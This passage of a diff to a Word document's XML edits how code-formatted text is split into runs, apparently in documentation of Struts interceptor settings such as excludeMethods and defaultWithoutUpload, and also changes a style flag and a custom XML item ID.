+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>excludeMethods</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>input,back</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>,cancel,browse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>param</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5197,7 +6326,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>&lt;default-interceptor-ref name="defaultWithoutUpload"/&gt;</w:t>
+        <w:t>&lt;default-interceptor-ref name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>defaultWithoutUpload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"/&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5875,6 +7022,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -6421,7 +7569,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D18E2CC9-B946-4D2C-AC2E-61849F630862}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E4D75877-BC68-4CDD-9E02-6AF88C4A796A}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
